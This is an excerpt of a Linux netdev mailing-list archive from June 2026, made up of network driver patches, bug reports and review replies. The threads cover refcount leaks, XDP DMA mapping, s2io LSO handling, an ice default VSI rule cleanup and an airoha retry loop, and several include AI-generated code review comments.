In-Reply-To: <f3bdd4c91f3e2269b4e256075f9dc70808b1b8e9.1782195965.git.shitalkumar.gandhi@cambiumnetworks.com>
On Tue, Jun 23, 2026 at 12:11:42PM +0530, Shitalkumar Gandhi wrote:
> mac->phy_node is acquired via of_parse_phandle() in spl2sw_probe() and
> stored in the mac private data, transferring ownership of the
> device_node reference to mac. On driver removal, spl2sw_phy_remove()
> disconnects the PHY but never drops that reference, so each
> probe-then-remove cycle leaks one of_node refcount per port permanently.
>
> Drop the reference after phy_disconnect(). While at it, remove the
> redundant inner "if (ndev)" check; comm->ndev[i] was just verified
> non-NULL on the line above.
>
> Compile-tested only; no SP7021 hardware available.
>
> Fixes: fd3040b9394c ("net: ethernet: Add driver for Sunplus SP7021")
> Signed-off-by: Shitalkumar Gandhi <shitalkumar.gandhi@cambiumnetworks.com>
Reviewed-by: Andrew Lunn <andrew@lunn.ch>
Andrew
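
The leak described in the commit message can be modelled with a toy reference count. This is a sketch, not the driver code: `toy_node`, `toy_mac` and the helper functions are hypothetical stand-ins for the device_node reference taken in probe and the missing put in remove.

```c
#include <assert.h>
#include <stddef.h>

struct toy_node {
	int refcount;
};

struct toy_mac {
	struct toy_node *phy_node;
};

static struct toy_node *toy_node_get(struct toy_node *n)
{
	n->refcount++;
	return n;
}

static void toy_node_put(struct toy_node *n)
{
	assert(n->refcount > 0);
	n->refcount--;
}

/* Probe takes a reference and hands ownership to the mac. */
static void toy_probe(struct toy_mac *mac, struct toy_node *n)
{
	mac->phy_node = toy_node_get(n);
}

/* Models the unpatched remove: the reference is never dropped. */
static void toy_remove_leaky(struct toy_mac *mac)
{
	mac->phy_node = NULL;
}

/* Models the patched remove: drop the reference the mac owns. */
static void toy_remove_fixed(struct toy_mac *mac)
{
	toy_node_put(mac->phy_node);
	mac->phy_node = NULL;
}
```

Each `toy_probe()` followed by `toy_remove_leaky()` raises the count by one for good, whereas pairing it with `toy_remove_fixed()` returns the count to its starting value.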
* [PATCH net v2] net: ti: icssg-prueth: fix XDP_TX from the AF_XDP zero-copy RX path
From: David Carlier @ 2026-06-23 11:22 UTC
To: danishanwar, rogerq, andrew+netdev, netdev
Cc: davem, edumazet, kuba, pabeni, horms, m-malladi, hawk,
john.fastabend, sdf, ast, daniel, bpf, linux-arm-kernel,
linux-kernel, stable, David Carlier
On XDP_TX from the zero-copy RX path, emac_run_xdp() converts the xsk
buffer via xdp_convert_zc_to_xdp_frame(), which clones the data into a
fresh MEM_TYPE_PAGE_ORDER0 page that is not DMA mapped. Transmitting it
as PRUETH_TX_BUFF_TYPE_XDP_TX derives the DMA address with
page_pool_get_dma_addr(), reading an uninitialized page->dma_addr, so
the device DMAs from a bogus address (corrupt TX, or an IOMMU fault).
Pick the TX buffer type from the frame's memory type: keep
PRUETH_TX_BUFF_TYPE_XDP_TX for page_pool frames and use
PRUETH_TX_BUFF_TYPE_XDP_NDO for the cloned zero-copy frame, which is then
DMA mapped through the NDO path and unmapped on completion.
While at it, fix the page_pool XDP_TX completion path. A
PRUETH_TX_BUFF_TYPE_XDP_TX frame carries a page_pool-owned DMA mapping
(established against rx_chn->dma_dev), yet prueth_xmit_free()
unconditionally calls dma_unmap_single() on it with tx_chn->dma_dev,
tearing down a mapping the driver does not own; xdp_return_frame()
already recycles the page back to the pool. Tag such frames with a
dedicated PRUETH_SWDATA_XDPF_TX type so the completion path skips the
unmap, the same way PRUETH_SWDATA_XSK buffers are handled.
Fixes: 7a64bb388df3 ("net: ti: icssg-prueth: Add AF_XDP zero copy for RX")
Fixes: 62aa3246f462 ("net: ti: icssg-prueth: Add XDP support")
Cc: stable@vger.kernel.org
Signed-off-by: David Carlier <devnexen@gmail.com>
---
v2:
- fold in the page_pool XDP_TX completion-path unmap fix raised by
Meghana Malladi: tag page_pool TX frames with PRUETH_SWDATA_XDPF_TX
so prueth_xmit_free() skips dma_unmap_single() on a pool-owned
mapping; xdp_return_frame() already recycles the page.
- add Fixes: 62aa3246f462 for that path.
- no change to the original zero-copy fix.
v1: https://lore.kernel.org/netdev/20260620213756.87499-1-devnexen@gmail.com
drivers/net/ethernet/ti/icssg/icssg_common.c | 20 +++++++++++++++++---
drivers/net/ethernet/ti/icssg/icssg_prueth.h | 1 +
2 files changed, 18 insertions(+), 3 deletions(-)
diff --git a/drivers/net/ethernet/ti/icssg/icssg_common.c b/drivers/net/ethernet/ti/icssg/icssg_common.c
index 82ddef9c17d5..96c8bf5ef671 100644
--- a/drivers/net/ethernet/ti/icssg/icssg_common.c
+++ b/drivers/net/ethernet/ti/icssg/icssg_common.c
@@ -185,7 +185,7 @@ void prueth_xmit_free(struct prueth_tx_chn *tx_chn,
first_desc = desc;
next_desc = first_desc;
swdata = cppi5_hdesc_get_swdata(first_desc);
- if (swdata->type == PRUETH_SWDATA_XSK)
+ if (swdata->type == PRUETH_SWDATA_XSK || swdata->type == PRUETH_SWDATA_XDPF_TX)
goto free_pool;
cppi5_hdesc_get_obuf(first_desc, &buf_dma, &buf_dma_len);
@@ -259,6 +259,7 @@ int emac_tx_complete_packets(struct prueth_emac *emac, int chn,
napi_consume_skb(skb, budget);
break;
case PRUETH_SWDATA_XDPF:
+ case PRUETH_SWDATA_XDPF_TX:
xdpf = swdata->data.xdpf;
dev_sw_netstats_tx_add(ndev, 1, xdpf->len);
total_bytes += xdpf->len;
@@ -769,7 +770,8 @@ u32 emac_xmit_xdp_frame(struct prueth_emac *emac,
k3_udma_glue_tx_dma_to_cppi5_addr(tx_chn->tx_chn, &buf_dma);
cppi5_hdesc_attach_buf(first_desc, buf_dma, xdpf->len, buf_dma, xdpf->len);
swdata = cppi5_hdesc_get_swdata(first_desc);
- swdata->type = PRUETH_SWDATA_XDPF;
+ swdata->type = buff_type == PRUETH_TX_BUFF_TYPE_XDP_TX ?
+ PRUETH_SWDATA_XDPF_TX : PRUETH_SWDATA_XDPF;
swdata->data.xdpf = xdpf;
/* Report BQL before sending the packet */
@@ -804,6 +806,7 @@ EXPORT_SYMBOL_GPL(emac_xmit_xdp_frame);
*/
static u32 emac_run_xdp(struct prueth_emac *emac, struct xdp_buff *xdp, u32 *len)
{
+ enum prueth_tx_buff_type tx_buff_type;
struct net_device *ndev = emac->ndev;
struct netdev_queue *netif_txq;
int cpu = smp_processor_id();
@@ -826,11 +829,21 @@ static u32 emac_run_xdp(struct prueth_emac *emac, struct xdp_buff *xdp, u32 *len
goto drop;
}
+ /* In AF_XDP zero-copy mode xdp_convert_buff_to_frame()
+ * clones the xsk buffer into a fresh MEM_TYPE_PAGE_ORDER0
+ * page that is not DMA mapped. Such a frame must be mapped
+ * via the NDO path; only a page pool-backed frame already
+ * carries a usable page_pool DMA address.
+ */
+ tx_buff_type = xdpf->mem_type == MEM_TYPE_PAGE_POOL ?
+ PRUETH_TX_BUFF_TYPE_XDP_TX :
+ PRUETH_TX_BUFF_TYPE_XDP_NDO;
+
q_idx = cpu % emac->tx_ch_num;
netif_txq = netdev_get_tx_queue(ndev, q_idx);
__netif_tx_lock(netif_txq, cpu);
result = emac_xmit_xdp_frame(emac, xdpf, q_idx,
- PRUETH_TX_BUFF_TYPE_XDP_TX);
+ tx_buff_type);
__netif_tx_unlock(netif_txq);
if (result == ICSSG_XDP_CONSUMED) {
ndev->stats.tx_dropped++;
@@ -1395,6 +1408,7 @@ void prueth_tx_cleanup(void *data, dma_addr_t desc_dma)
dev_kfree_skb_any(skb);
break;
case PRUETH_SWDATA_XDPF:
+ case PRUETH_SWDATA_XDPF_TX:
xdpf = swdata->data.xdpf;
xdp_return_frame(xdpf);
break;
diff --git a/drivers/net/ethernet/ti/icssg/icssg_prueth.h b/drivers/net/ethernet/ti/icssg/icssg_prueth.h
index df93d15c5b78..00bb760d68a9 100644
--- a/drivers/net/ethernet/ti/icssg/icssg_prueth.h
+++ b/drivers/net/ethernet/ti/icssg/icssg_prueth.h
@@ -153,6 +153,7 @@ enum prueth_swdata_type {
PRUETH_SWDATA_CMD,
PRUETH_SWDATA_XDPF,
PRUETH_SWDATA_XSK,
+ PRUETH_SWDATA_XDPF_TX,
};
enum prueth_tx_buff_type {
--
2.53.0
* Re: [PATCH v2 2/2] net: fman: use devm_kzalloc() for fman and rely on devres
From: Andrew Lunn @ 2026-06-23 11:22 UTC
To: 赵金明
Cc: horms, andrew+netdev, davem, edumazet, kuba, linux-kernel,
madalin.bucur, netdev, pabeni, sean.anderson
In-Reply-To: <823580887DE24145+2026062314162397367012@uniontech.com>
On Tue, Jun 23, 2026 at 02:16:25PM +0800, 赵金明 wrote:
> Hi Andrew,
>
> Thank you for pointing me to the netdev maintainer documentation. I have
> read section 1.7.4 and I understand the concern about standalone
> cleanup conversions.
>
> I would like to clarify the actual motivation behind the
> devm_kzalloc() change. While it may appear to be a simple devm_
> conversion on the surface, it is in fact fixing a use-after-free race
> condition in the IRQF_SHARED error paths. Let me explain the problem
> in detail.
Please make the commit message explain what the fix is, rather than
just saying it converts to devm_.
But I also hope you see why we don't like devm_ conversions,
because developers get them wrong like this. And all too often, they
do the conversion without actual hardware to test it with. So it
results in more bugs, not less.
Andrew
^ permalink raw reply
* s2io: driver still in use - please reconsider removal
From: Michael Pratte @ 2026-06-23 11:21 UTC (permalink / raw)
To: Jakub Kicinski, Paolo Abeni
Cc: Eric Dumazet, Ethan Nelson-Moore, Andrew Lunn, Simon Horman,
David S . Miller, netdev
Hi,
Commit aba0138eb7d7 ("net: ethernet: neterion: s2io: remove unused
driver") removed s2io in v7.0 as "highly unlikely to still be used."
It is still in use here: an Exar Xframe-II (PCI 17d5:5832) in a
Supermicro X5DA8.
Bringing it up, I found that no TCP can be transmitted on these
adapters since v4.2. I bisected it to 51466a7545b7 ("tcp: fill
shinfo->gso_type at last moment"): since that commit tcp_transmit_skb()
sets skb_shinfo(skb)->gso_type unconditionally, non-GSO TCP frames now
reach s2io_xmit() with gso_type=SKB_GSO_TCPV4 but gso_size=0. The driver
arms the hardware LSO engine off gso_type alone and programs MSS=0,
which the Xframe-II rejects (LSO6_ABORT), dropping every TCP frame
before the MAC. UDP and ICMP are unaffected.
The fix is one line - only arm LSO for skbs that are really GSO:
- if (offload_type & (SKB_GSO_TCPV4 | SKB_GSO_TCPV6)) {
+ if ((offload_type & (SKB_GSO_TCPV4 | SKB_GSO_TCPV6)) && skb_is_gso(skb)) {
I have submitted that patch to stable@ for the 6.6.y and 6.12.y trees
that still carry the driver. Given it is evidently still in use, would
you consider reverting the removal?
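For illustration, the condition change can be modelled in plain C outside
the kernel. This is a minimal sketch, not the driver source: struct
sketch_shinfo, the SKETCH_GSO_* values and both helper names are made up
for the example. The only kernel behaviour it assumes is that skb_is_gso()
tests for a non-zero gso_size.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Placeholder flag values for this sketch, not the kernel's definitions. */
#define SKETCH_GSO_TCPV4 (1u << 0)
#define SKETCH_GSO_TCPV6 (1u << 1)

/* Hypothetical stand-in for the two skb_shinfo() fields that matter here. */
struct sketch_shinfo {
	unsigned int gso_type;
	unsigned int gso_size;
};

/* Old test: arm LSO whenever a TCP gso_type bit is set. */
static bool arm_lso_old(const struct sketch_shinfo *si)
{
	assert(si != NULL);
	return (si->gso_type & (SKETCH_GSO_TCPV4 | SKETCH_GSO_TCPV6)) != 0;
}

/* Fixed test: additionally require a non-zero gso_size. */
static bool arm_lso_fixed(const struct sketch_shinfo *si)
{
	return arm_lso_old(si) && si->gso_size != 0;
}
```

With gso_type set and gso_size 0 (the non-GSO TCP case described above),
the old test arms LSO and the fixed one does not.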
Thanks,
Michael Pratte
^ permalink raw reply
* [PATCH bpf-next v2] bpf, unix: Guard sk_msg-dependent code behind CONFIG_NET_SOCK_MSG
From: Jakub Sitnicki @ 2026-06-23 11:20 UTC (permalink / raw)
To: bpf
Cc: Alexei Starovoitov, Daniel Borkmann, Jakub Kicinski, Jiayuan Chen,
John Fastabend, Kuniyuki Iwashima, netdev, kernel-team
Prepare to decouple the BPF_SYSCALL config option from NET_SOCK_MSG. Once
that is completed, all code paths related to sockmap-based redirects should be
guarded by BPF_SYSCALL && NET_SOCK_MSG to allow users to opt out by
disabling NET_SOCK_MSG. The implementation of sockmap as a container for
socket references would remain under BPF_SYSCALL.
Signed-off-by: Jakub Sitnicki <jakub@cloudflare.com>
---
Changes in v2:
- Handle prot->recvmsg being NULL (Sashiko)
- Elaborate on the end goal in description
- Link to v1: https://patch.msgid.link/20260622-bpf-sk_msg-split-unix-v1-1-d7e0cb7bb03b@cloudflare.com
---
net/unix/af_unix.c | 4 ++--
net/unix/unix_bpf.c | 6 ++++++
2 files changed, 8 insertions(+), 2 deletions(-)
diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
index f7a9d55eee8a..84c11c60c75f 100644
--- a/net/unix/af_unix.c
+++ b/net/unix/af_unix.c
@@ -2675,7 +2675,7 @@ static int unix_dgram_recvmsg(struct socket *sock, struct msghdr *msg, size_t si
#ifdef CONFIG_BPF_SYSCALL
const struct proto *prot = READ_ONCE(sk->sk_prot);
- if (prot != &unix_dgram_proto)
+ if (prot->recvmsg)
return prot->recvmsg(sk, msg, size, flags);
#endif
return __unix_dgram_recvmsg(sk, msg, size, flags);
@@ -3152,7 +3152,7 @@ static int unix_stream_recvmsg(struct socket *sock, struct msghdr *msg,
struct sock *sk = sock->sk;
const struct proto *prot = READ_ONCE(sk->sk_prot);
- if (prot != &unix_stream_proto)
+ if (prot->recvmsg)
return prot->recvmsg(sk, msg, size, flags);
#endif
return unix_stream_read_generic(&state, true);
diff --git a/net/unix/unix_bpf.c b/net/unix/unix_bpf.c
index f86ff19e9764..5289a04b4993 100644
--- a/net/unix/unix_bpf.c
+++ b/net/unix/unix_bpf.c
@@ -7,6 +7,7 @@
#include "af_unix.h"
+#ifdef CONFIG_NET_SOCK_MSG
#define unix_sk_has_data(__sk, __psock) \
({ !skb_queue_empty(&__sk->sk_receive_queue) || \
!skb_queue_empty(&__psock->ingress_skb) || \
@@ -94,6 +95,7 @@ static int unix_bpf_recvmsg(struct sock *sk, struct msghdr *msg,
sk_psock_put(sk, psock);
return copied;
}
+#endif /* CONFIG_NET_SOCK_MSG */
static struct proto *unix_dgram_prot_saved __read_mostly;
static DEFINE_SPINLOCK(unix_dgram_prot_lock);
@@ -107,8 +109,10 @@ static void unix_dgram_bpf_rebuild_protos(struct proto *prot, const struct proto
{
*prot = *base;
prot->close = sock_map_close;
+#ifdef CONFIG_NET_SOCK_MSG
prot->recvmsg = unix_bpf_recvmsg;
prot->sock_is_readable = sk_msg_is_readable;
+#endif
}
static void unix_stream_bpf_rebuild_protos(struct proto *prot,
@@ -116,8 +120,10 @@ static void unix_stream_bpf_rebuild_protos(struct proto *prot,
{
*prot = *base;
prot->close = sock_map_close;
+#ifdef CONFIG_NET_SOCK_MSG
prot->recvmsg = unix_bpf_recvmsg;
prot->sock_is_readable = sk_msg_is_readable;
+#endif
prot->unhash = sock_map_unhash;
}
^ permalink raw reply related
* Re: [PATCH] MAINTAINERS: Orphan SUNPLUS ETHERNET DRIVER
From: Andrew Lunn @ 2026-06-23 11:15 UTC (permalink / raw)
To: Wells Lu
Cc: Jakub Kicinski, netdev, linux-kernel, Shitalkumar Gandhi,
David S . Miller, Eric Dumazet, Paolo Abeni, Simon Horman,
Shitalkumar Gandhi
In-Reply-To: <20260622180721.28334-1-wellslutw@gmail.com>
On Tue, Jun 23, 2026 at 02:07:21AM +0800, Wells Lu wrote:
> I have left Sunplus and no longer have access to the relevant hardware
> to test or maintain this driver. Mark the driver as orphaned.
>
> Signed-off-by: Wells Lu <wellslutw@gmail.com>
Reviewed-by: Andrew Lunn <andrew@lunn.ch>
Andrew
^ permalink raw reply
* Re: [PATCH iwl-net] ice: clear the default forwarding VSI rule when releasing a VSI
From: Petr Oros @ 2026-06-23 10:57 UTC (permalink / raw)
To: Simon Horman
Cc: netdev, anthony.l.nguyen, przemyslaw.kitszel, andrew+netdev,
davem, edumazet, kuba, pabeni, jacob.e.keller, michal.swiatkowski,
intel-wired-lan, linux-kernel
In-Reply-To: <20260623102934.1072800-1-horms@kernel.org>
On 6/23/26 12:29, Simon Horman wrote:
> This is an AI-generated review of your patch. The human sending this
> email has considered the AI review valid, or at least plausible.
> Full review at: https://sashiko.dev
> ---
> ice: clear the default forwarding VSI rule when releasing a VSI
>
> This patch restores the cleanup of the default forwarding VSI rule
> in ice_vsi_release(), clearing it when the VSI owns it. This prevents
> a rule leak if a trusted VF enters promiscuous mode and is then destroyed.
>
>> diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c
>> --- a/drivers/net/ethernet/intel/ice/ice_lib.c
>> +++ b/drivers/net/ethernet/intel/ice/ice_lib.c
>> @@ -2871,6 +2871,9 @@ int ice_vsi_release(struct ice_vsi *vsi)
>> return -ENODEV;
>> pf = vsi->back;
>>
>> + if (ice_is_vsi_dflt_vsi(vsi))
>> + ice_clear_dflt_vsi(vsi);
>> +
> [Severity: High]
> Is there a time-of-check to time-of-use race here?
>
> ice_is_vsi_dflt_vsi() acquires and releases the filt_rule_lock to check if
> the current VSI is the default. If true, ice_clear_dflt_vsi() is called,
> which acquires the lock again during rule removal.
>
> If the lock is dropped between these two calls, could another thread
> establish a new default VSI rule before ice_clear_dflt_vsi() runs?
>
> When ice_clear_dflt_vsi() executes, it appears the rule search only matches
> by l_data and flag:
>
> ice_switch.c:ice_find_rule_entry() {
> if (!memcmp(&f_info->l_data, &list_itr->fltr_info.l_data,
> sizeof(f_info->l_data)) &&
> f_info->flag == list_itr->fltr_info.flag) {
> ...
> }
>
> For the default VSI rule, l_data is empty, so it might match any newly
> established default rule.
>
> And since ice_remove_rule_internal() does not appear to validate the
> vsi_handle for non-list rules:
>
> ice_switch.c:ice_remove_rule_internal() {
> if (list_elem->fltr_info.fltr_act != ICE_FWD_TO_VSI_LIST) {
> remove_rule = true;
> ...
> }
>
> Could this blindly remove the default forwarding configuration for a
> completely unrelated VSI?
The dropped lock isn't new here. The whole dflt_vsi API is check-then-act.
ice_vsi_sync_fltr() does the same if (ice_is_vsi_dflt_vsi(vsi))
ice_clear_dflt_vsi(vsi), and this path runs under vf->cfg_lock, the same
domain as the ice_vf_clear_all_promisc_modes() cleanup it restores. There
is at most one DFLT rule per direction, because a second default VSI folds
both into one ICE_FWD_TO_VSI_LIST, which is the leak this fixes, so the
empty l_data match is unambiguous. In that list case removal honors the
handle via ice_rem_update_vsi_list() and drops only the requested VSI. The
unvalidated whole-rule branch is only the single VSI case where that VSI is
the sole default, so removing it is intended. An unrelated removal would
require another context to clear this VSI and install a different sole
default in the gap, but those flows are serialized per context with rtnl,
vf->cfg_lock and ICE_CFG_BUSY.
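A rough userspace model of the two removal branches described above, for
illustration only. It is not the ice switch code: the bitmask
representation and all sketch_* names are assumptions made up for this
example, and locking is left out entirely.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model: one default rule, with its VSI handles kept as a bitmask. */
struct sketch_dflt_rule {
	uint32_t vsi_mask;	/* bit n set => VSI handle n is a default VSI */
};

static bool sketch_is_dflt(const struct sketch_dflt_rule *r, unsigned int vsi)
{
	assert(r != NULL && vsi < 32);
	return (r->vsi_mask >> vsi) & 1u;
}

static void sketch_remove(struct sketch_dflt_rule *r, unsigned int vsi)
{
	if (r->vsi_mask & (r->vsi_mask - 1))
		/* List case (more than one VSI): drop only the requested handle. */
		r->vsi_mask &= ~(UINT32_C(1) << vsi);
	else
		/* Single VSI case: the whole rule goes, the handle is not checked. */
		r->vsi_mask = 0;
}

/* Check-then-act, as in the release path under discussion. */
static void sketch_release(struct sketch_dflt_rule *r, unsigned int vsi)
{
	if (sketch_is_dflt(r, vsi))
		sketch_remove(r, vsi);
}
```

In this model the unchecked branch is only reached when the releasing VSI
is the sole default, provided nothing else changes the rule between the
check and the removal.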
Regards,
Petr
>> if (test_bit(ICE_FLAG_RSS_ENA, pf->flags))
>> ice_rss_clean(vsi);
^ permalink raw reply
* Re: [PATCH net v2] net: airoha: Add retry mechanism to airoha_qdma_set_trtcm_param()
From: Simon Horman @ 2026-06-23 10:53 UTC (permalink / raw)
To: lorenzo
Cc: Simon Horman, andrew+netdev, davem, edumazet, kuba, pabeni,
leto.liu, linux-arm-kernel, linux-mediatek, netdev, brown.huang
In-Reply-To: <20260622-airoha_qdma_set_trtcm_param-retry-fix-v2-1-95a83ac99dbd@kernel.org>
This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
Full review at: https://sashiko.dev
Simon says: I'd appreciate it if you could look over the first two issues
flagged below in the context of this patch. The third and final issue
looks like possible material for a separate follow-up.
---
net: airoha: Add retry mechanism to airoha_qdma_set_trtcm_param()
This patch introduces a retry loop to airoha_qdma_set_trtcm_param() to mitigate
bus timeouts when configuring QDMA parameters. It attempts to verify that the
configuration is correctly applied to the hardware.
> diff --git a/drivers/net/ethernet/airoha/airoha_eth.c b/drivers/net/ethernet/airoha/airoha_eth.c
> index 3370c3df7c107..bb5c0599a4eed 100644
> --- a/drivers/net/ethernet/airoha/airoha_eth.c
> +++ b/drivers/net/ethernet/airoha/airoha_eth.c
> @@ -2673,14 +2673,30 @@ static int airoha_qdma_set_trtcm_param(struct airoha_qdma *qdma, int channel,
> FIELD_PREP(TRTCM_METER_GROUP_MASK, group) |
> FIELD_PREP(TRTCM_PARAM_INDEX_MASK, idx) |
> FIELD_PREP(TRTCM_PARAM_RATE_TYPE_MASK, mode);
> + int i;
>
> - airoha_qdma_wr(qdma, REG_TRTCM_DATA_LOW(addr), val);
> - airoha_qdma_wr(qdma, REG_TRTCM_CFG_PARAM(addr), config);
> + for (i = 0; i < 100; i++) {
> + u32 data;
>
> - return read_poll_timeout(airoha_qdma_rr, val,
> - val & TRTCM_PARAM_RW_DONE_MASK,
> - USEC_PER_MSEC, 10 * USEC_PER_MSEC, true,
> - qdma, REG_TRTCM_CFG_PARAM(addr));
> + airoha_qdma_wr(qdma, REG_TRTCM_DATA_LOW(addr), val);
> + wmb();
> + airoha_qdma_wr(qdma, REG_TRTCM_CFG_PARAM(addr), config);
> +
> + if (read_poll_timeout(airoha_qdma_rr, data,
> + data & TRTCM_PARAM_RW_DONE_MASK,
> + USEC_PER_MSEC, 10 * USEC_PER_MSEC,
> + true, qdma, REG_TRTCM_CFG_PARAM(addr)))
> + return -ETIMEDOUT;
[Severity: High]
If a bus timeout causes the write phase's read_poll_timeout() in
airoha_qdma_set_trtcm_param() to fail, this immediately returns -ETIMEDOUT,
aborting the 100-iteration retry loop.
Doesn't this defeat the mitigation?
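One possible shape for a loop where a timed-out attempt counts as a failed
try rather than ending the loop, sketched in userspace C. This is an
assumption about what could work, not a proposed patch: sketch_retry(),
the callback type and sketch_fail_twice() are hypothetical, and the sketch
does not address whether re-issuing a command to busy hardware is safe.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Hypothetical callback for one write-and-poll attempt: 0 or a negative errno. */
typedef int (*sketch_attempt_fn)(void *ctx);

/* Retry up to max_tries times; only errors other than -ETIMEDOUT end the loop early. */
static int sketch_retry(sketch_attempt_fn attempt, void *ctx, int max_tries)
{
	int i, err = -EBUSY;

	assert(attempt != NULL && max_tries > 0);
	for (i = 0; i < max_tries; i++) {
		err = attempt(ctx);
		if (!err)
			return 0;
		if (err != -ETIMEDOUT)
			return err;	/* treated as fatal in this sketch */
	}
	return err;
}

/* Fake attempt for demonstration: times out twice, then succeeds. */
static int sketch_fail_twice(void *ctx)
{
	int *calls = ctx;

	return ++(*calls) < 3 ? -ETIMEDOUT : 0;
}
```

With a budget of 100 tries the fake attempt succeeds on its third call. With
a budget of 2 the last -ETIMEDOUT is what the caller sees.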
> +
> + if (airoha_qdma_get_trtcm_param(qdma, channel, addr, param,
> + mode, &data, NULL))
> + continue;
[Severity: High]
If airoha_qdma_get_trtcm_param() times out during the verification phase, it
indicates the hardware hasn't finished the read command (DONE bit is still 0).
The continue statement then immediately starts the next iteration, writing new
commands to DATA_LOW and CFG_PARAM.
Can writing to command registers while the hardware state machine is actively
busy violate hardware protocols and lead to unrecoverable lockups?
> +
> + if (data == val)
> + return 0;
[Severity: High]
This isn't a bug introduced by this patch, but if the bus drops the command
write to REG_TRTCM_CFG_PARAM, the hardware never executes the command and the
TRTCM_PARAM_RW_DONE_MASK bit remains set from the previous operation.
Consequently, read_poll_timeout() returns an immediate false success.
If both the set and get command writes are dropped by the bus, the get
operation will read back the newly written DATA_LOW register value.
Will the data == val check evaluate to true and falsely report success without
the hardware ever processing the configuration?
> + }
> +
> + return -EBUSY;
> }
>
[ ... ]
> static int airoha_qdma_set_trtcm_config(struct airoha_qdma *qdma, int channel,
> u32 addr, enum trtcm_mode_type mode,
> bool enable, u32 enable_mask)
> {
> u32 val;
>
> if (airoha_qdma_get_trtcm_param(qdma, channel, addr, TRTCM_MISC_MODE,
> mode, &val, NULL))
> return -EINVAL;
[Severity: High]
Standalone calls to airoha_qdma_get_trtcm_param(), like this one in
airoha_qdma_set_trtcm_config(), lack a retry loop entirely.
Does this leave read-modify-write cycles fully vulnerable to the same bus
timeouts the patch attempts to mitigate?
[Severity: High]
This isn't a bug introduced by this patch, but the patch mitigates bus
timeouts in airoha_qdma_set_trtcm_param() while entirely missing
airoha_qdma_set_rl_param().
The latter performs the exact same write-and-poll sequence on identical QDMA
configuration registers:
drivers/net/ethernet/airoha/airoha_eth.c:airoha_qdma_set_rl_param() {
...
return read_poll_timeout(..., val & RATE_LIMIT_PARAM_RW_DONE_MASK, ...);
}
If bus timeouts affect QDMA access broadly as stated in the commit message, are
the rate-limiting configuration paths randomly vulnerable to the same failures?
[Severity: High]
This isn't a bug introduced by this patch, but in airoha_tc_remove_htb_queue(),
hardware teardown incorrectly uses queue + 1 instead of queue:
drivers/net/ethernet/airoha/airoha_eth.c:airoha_tc_remove_htb_queue() {
...
airoha_qdma_set_tx_rate_limit(netdev, queue + 1, 0, 0);
...
}
Does this leave the removed queue's hardware limits permanently active
(resource leak) and inadvertently disable the rate limits for queue + 1,
corrupting the QoS state of another active channel?
^ permalink raw reply
* Re: [PATCH net V3 1/3] net/mlx5e: Fix HV VHCA stats zero-sized buffer allocation
From: Simon Horman @ 2026-06-23 10:46 UTC (permalink / raw)
To: tariqt
Cc: Simon Horman, andrew+netdev, davem, edumazet, kuba, netdev,
pabeni, cratiu, eranbe, feliu, haiyangz, lkayal, leon,
linux-kernel, linux-rdma, mbloch, noren, saeedm, gal, alazar,
cjubran, kees, eranbe, saeedm
In-Reply-To: <20260622083646.593220-2-tariqt@nvidia.com>
This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
Full review at: https://sashiko.dev
Simon says: I think this issue can be addressed by reversing the order
that patches 1/3 and 2/3 appear in this patch-set.
---
net/mlx5e: Fix HV VHCA stats zero-sized buffer allocation
This commit fixes a zero-sized buffer allocation by using max_nch instead of
stats_nch when allocating the buffer for HV VHCA stats.
> diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/hv_vhca_stats.c b/drivers/net/ethernet/mellanox/mlx5/core/en/hv_vhca_stats.c
> index 195863b2c013e..06cbd49d4e98e 100644
> --- a/drivers/net/ethernet/mellanox/mlx5/core/en/hv_vhca_stats.c
> +++ b/drivers/net/ethernet/mellanox/mlx5/core/en/hv_vhca_stats.c
> @@ -122,7 +128,7 @@ static void mlx5e_hv_vhca_stats_cleanup(struct mlx5_hv_vhca_agent *agent)
>
> void mlx5e_hv_vhca_stats_create(struct mlx5e_priv *priv)
> {
> - int buf_len = mlx5e_hv_vhca_stats_buf_size(priv);
> + int buf_len = mlx5e_hv_vhca_stats_buf_max_size(priv);
> struct mlx5_hv_vhca_agent *agent;
>
> priv->stats_agent.buf = kvzalloc(buf_len, GFP_KERNEL);
[Severity: High]
Does this change introduce a potential double-free regression on memory
allocation failure?
When mlx5e_hv_vhca_stats_destroy() cleans up the stats agent, it frees the
agent but does not set priv->stats_agent.agent to NULL.
Before this patch, kvzalloc() was called with 0 and returned ZERO_SIZE_PTR,
so it never returned NULL. It always proceeded to call
mlx5_hv_vhca_agent_create() which overwrote priv->stats_agent.agent.
Now that the buffer size is non-zero, if kvzalloc() fails it will return
NULL and take the early return path in mlx5e_hv_vhca_stats_create():
priv->stats_agent.buf = kvzalloc(buf_len, GFP_KERNEL);
if (!priv->stats_agent.buf)
return;
This early return bypasses overwriting the dangling priv->stats_agent.agent.
If a subsequent device detach occurs, mlx5e_hv_vhca_stats_destroy() could
dereference and free this stale pointer again.
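A generic way to make such a destroy path safe to run twice is to clear
each pointer after freeing it. The following is a userspace sketch of that
idiom only: struct sketch_stats_agent and sketch_stats_destroy() are
hypothetical names, and this is not a description of how the driver or any
later commit handles it.

```c
#include <assert.h>
#include <stdlib.h>

/* Hypothetical stand-in for the stats agent state discussed above. */
struct sketch_stats_agent {
	void *agent;
	void *buf;
};

/* Free both members and clear them, so a second destroy is a no-op. */
static void sketch_stats_destroy(struct sketch_stats_agent *sa)
{
	assert(sa != NULL);
	free(sa->agent);	/* free(NULL) is defined to do nothing */
	sa->agent = NULL;
	free(sa->buf);
	sa->buf = NULL;
}
```

With the pointers cleared, an early return in a later create call leaves
NULL behind instead of a stale address.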
I noticed this was later addressed upstream in commit e600849cc1e0
("net/mlx5e: Fix HV VHCA stats agent registration race").
^ permalink raw reply
* Re: [PATCH] rocker: Fix memory leak in ofdpa_port_fdb()
From: Jiri Pirko @ 2026-06-23 10:39 UTC (permalink / raw)
To: Jakub Kicinski
Cc: Andrew Lunn, Jacob Keller, Ziran Zhang, Andrew Lunn,
David S . Miller, Eric Dumazet, Paolo Abeni, netdev, linux-kernel
In-Reply-To: <20260617164411.2a8a260e@kernel.org>
